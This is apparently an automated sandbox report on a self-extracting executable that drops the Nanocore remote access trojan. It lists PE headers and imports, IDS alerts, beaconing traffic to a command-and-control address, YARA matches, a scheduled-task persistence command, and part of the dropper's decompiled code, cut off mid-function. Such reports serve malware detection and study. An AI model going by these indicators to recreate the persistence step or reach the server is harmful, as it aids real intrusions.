                                                                          • [EXP] VS2015 UPD3.1 build 24215
                                                                          • [LNK] VS2015 UPD3.1 build 24215
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [C++] VS2015 UPD3.1 build 24215
                                                                          • [RES] VS2015 UPD3 build 24213

                                                                          Data Directories

                                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3b540 | 0x34 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b574 | 0x3c | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x4c28 | .rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x67000 | 0x210c | .reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x397d0 | 0x54 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34218 | 0x40 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x32000 | 0x260 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3aaec | 0x120 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                          Sections

                                                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                          .text | 0x1000 | 0x30581 | 0x30600 | False | 0.589268410853 | data | 6.70021125825 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rdata | 0x32000 | 0xa332 | 0xa400 | False | 0.455030487805 | data | 5.23888424127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data | 0x3d000 | 0x238b0 | 0x1200 | False | 0.368272569444 | data | 3.83993526939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .gfids | 0x61000 | 0xe8 | 0x200 | False | 0.333984375 | data | 2.12166381533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc | 0x62000 | 0x4c28 | 0x4e00 | False | 0.602263621795 | data | 6.36874241417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc | 0x67000 | 0x210c | 0x2200 | False | 0.786534926471 | data | 6.61038519378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          Name | RVA | Size | Type | Language | Country
                                                                          PNG | 0x62524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
                                                                          PNG | 0x6306c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
                                                                          RT_ICON | 0x64618 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870 | |
                                                                          RT_DIALOG | 0x64900 | 0x286 | data | English | United States
                                                                          RT_DIALOG | 0x64b88 | 0x13a | data | English | United States
                                                                          RT_DIALOG | 0x64cc4 | 0xec | data | English | United States
                                                                          RT_DIALOG | 0x64db0 | 0x12e | data | English | United States
                                                                          RT_DIALOG | 0x64ee0 | 0x338 | data | English | United States
                                                                          RT_DIALOG | 0x65218 | 0x252 | data | English | United States
                                                                          RT_STRING | 0x6546c | 0x1e2 | data | English | United States
                                                                          RT_STRING | 0x65650 | 0x1cc | data | English | United States
                                                                          RT_STRING | 0x6581c | 0x1b8 | data | English | United States
                                                                          RT_STRING | 0x659d4 | 0x146 | Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500 | English | United States
                                                                          RT_STRING | 0x65b1c | 0x446 | data | English | United States
                                                                          RT_STRING | 0x65f64 | 0x166 | data | English | United States
                                                                          RT_STRING | 0x660cc | 0x152 | data | English | United States
                                                                          RT_STRING | 0x66220 | 0x10a | data | English | United States
                                                                          RT_STRING | 0x6632c | 0xbc | data | English | United States
                                                                          RT_STRING | 0x663e8 | 0xd6 | data | English | United States
                                                                          RT_GROUP_ICON | 0x664c0 | 0x14 | data | |
                                                                          RT_MANIFEST | 0x664d4 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

                                                                          Imports

                                                                          DLL | Import
                                                                          KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                          gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                          Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/13/21-12:00:04.635221 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 60501 | 8.8.8.8 | 192.168.2.7
10/13/21-12:00:04.720504 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 60501 | 8.8.8.8 | 192.168.2.7
10/13/21-12:00:16.594375 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51837 | 8.8.8.8 | 192.168.2.7
10/13/21-12:00:37.676948 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 63668 | 8.8.8.8 | 192.168.2.7
10/13/21-12:00:48.500016 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 60338 | 8.8.8.8 | 192.168.2.7
10/13/21-12:01:20.355715 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50860 | 8.8.8.8 | 192.168.2.7
10/13/21-12:01:46.346307 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59730 | 8.8.8.8 | 192.168.2.7
10/13/21-12:01:51.665856 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59310 | 8.8.8.8 | 192.168.2.7
10/13/21-12:02:12.493659 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 64296 | 8.8.8.8 | 192.168.2.7
10/13/21-12:02:17.809141 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 56680 | 8.8.8.8 | 192.168.2.7
10/13/21-12:02:23.162203 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 58820 | 8.8.8.8 | 192.168.2.7
10/13/21-12:02:44.037075 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 60983 | 8.8.8.8 | 192.168.2.7
10/13/21-12:03:25.959416 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61457 | 8.8.8.8 | 192.168.2.7
10/13/21-12:03:46.660830 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 58367 | 8.8.8.8 | 192.168.2.7

                                                                          TCP Packets

                                                                          Oct 13, 2021 12:03:10.142997026 CEST498848338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:10.186216116 CEST833849884194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:10.697097063 CEST498848338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:10.740314007 CEST833849884194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:11.243129015 CEST498848338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:11.286302090 CEST833849884194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:15.378891945 CEST498858338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:15.430392027 CEST833849885194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:15.945976019 CEST498858338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:15.989090919 CEST833849885194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:16.493043900 CEST498858338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:16.536217928 CEST833849885194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:20.663908005 CEST498868338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:20.709228992 CEST833849886194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:21.212074041 CEST498868338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:21.255321026 CEST833849886194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:21.758959055 CEST498868338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:21.802119017 CEST833849886194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:25.960961103 CEST498878338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:26.005583048 CEST833849887194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:26.509443045 CEST498878338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:26.552582979 CEST833849887194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:27.056265116 CEST498878338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:27.099555969 CEST833849887194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:31.122327089 CEST498888338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:31.164597034 CEST833849888194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:31.666060925 CEST498888338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:31.708296061 CEST833849888194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:32.213167906 CEST498888338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:32.255372047 CEST833849888194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:36.260996103 CEST498898338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:36.303255081 CEST833849889194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:36.807200909 CEST498898338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:36.849201918 CEST833849889194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:37.354068995 CEST498898338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:37.396158934 CEST833849889194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:41.402499914 CEST498908338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:41.444822073 CEST833849890194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:41.948237896 CEST498908338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:41.990536928 CEST833849890194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:42.495872974 CEST498908338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:42.537987947 CEST833849890194.5.98.48192.168.2.7
                                                                          Oct 13, 2021 12:03:46.661705017 CEST498918338192.168.2.7194.5.98.48
                                                                          Oct 13, 2021 12:03:46.703533888 CEST833849891194.5.98.48192.168.2.7

                                                                          UDP Packets


                                                                          DNS Queries


                                                                          DNS Answers


                                                                          Code Manipulations

                                                                          Statistics


                                                                          System Behavior

                                                                          General

Start time: 11:59:30
Start date: 13/10/2021
Path: C:\Users\user\Desktop\YdACOWCggQ.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\YdACOWCggQ.exe'
Imagebase: 0x190000
File size: 1073384 bytes
MD5 hash: B866823E1F8F4A52376BD108C457DD78
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                          General

Start time: 11:59:49
Start date: 13/10/2021
Path: C:\Users\user\33920049\mmuiqlcvwo.pif
Wow64 process (32bit): true
Commandline: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Imagebase: 0x830000
File size: 777456 bytes
MD5 hash: 8E699954F6B5D64683412CC560938507
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Antivirus matches:
                                                                          • Detection: 27%, Virustotal
                                                                          • Detection: 32%, ReversingLabs
                                                                          Reputation:low

                                                                          General

                                                                          Start time:11:59:55
                                                                          Start date:13/10/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
                                                                          Imagebase:0xe80000
                                                                          File size:45152 bytes
                                                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal
                                                                          • Detection: 0%, Metadefender
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          General

                                                                          Start time:11:59:59
                                                                          Start date:13/10/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'
                                                                          Imagebase:0x1190000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:11:59:59
                                                                          Start date:13/10/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff774ee0000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:12:00:00
                                                                          Start date:13/10/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
                                                                          Imagebase:0xbe0000
                                                                          File size:45152 bytes
                                                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:12:00:01
                                                                          Start date:13/10/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff774ee0000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                            Executed Functions

                                                                            C-Code - Quality: 17%
                                                                            			E001ACBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
                                                                            				char _v208;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* _t41;
                                                                            				long _t51;
                                                                            				void* _t54;
                                                                            				intOrPtr _t58;
                                                                            				struct HWND__* _t74;
                                                                            				void* _t75;
                                                                            				WCHAR* _t95;
                                                                            				struct HINSTANCE__* _t97;
                                                                            				intOrPtr _t99;
                                                                            				void* _t103;
                                                                            				void* _t105;
                                                                            				void* _t106;
                                                                            				void* _t107;
                                                                            				void* _t125;
                                                                            
                                                                            				_t125 = __fp0;
                                                                            				_t89 = __edx;
                                                                            				E0019FD49(__edx, 1);
                                                                            				E001A95F8("C:\Users\frontdesk\Desktop", 0x800);
                                                                            				E001A9AA0( &_v208); // executed
                                                                            				E001A1017(0x1d7370);
                                                                            				_t74 = 0;
                                                                            				E001AE920(0x7104, 0x1e5d08, 0, 0x7104);
                                                                            				_t106 = _t105 + 0xc;
                                                                            				_t95 = GetCommandLineW();
                                                                            				_t110 = _t95;
                                                                            				if(_t95 != 0) {
                                                                            					_push(_t95);
                                                                            					E001AB356(0, _t110);
                                                                            					if( *0x1d9601 == 0) {
                                                                            						E001AC891(__eflags, _t95);
                                                                            					} else {
                                                                            						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
                                                                            						if(_t103 != 0) {
                                                                            							UnmapViewOfFile(_t75);
                                                                            							_t74 = 0;
                                                                            						}
                                                                            						CloseHandle(_t103);
                                                                            					}
                                                                            				}
                                                                            				GetModuleFileNameW(_t74, 0x1ece18, 0x800);
                                                                            				SetEnvironmentVariableW(L"sfxname", 0x1ece18); // executed
                                                                            				GetLocalTime(_t106 + 0xc);
                                                                            				_push( *(_t106 + 0x1a) & 0x0000ffff);
                                                                            				_push( *(_t106 + 0x1c) & 0x0000ffff);
                                                                            				_push( *(_t106 + 0x1e) & 0x0000ffff);
                                                                            				_push( *(_t106 + 0x20) & 0x0000ffff);
                                                                            				_push( *(_t106 + 0x22) & 0x0000ffff);
                                                                            				_push( *(_t106 + 0x22) & 0x0000ffff);
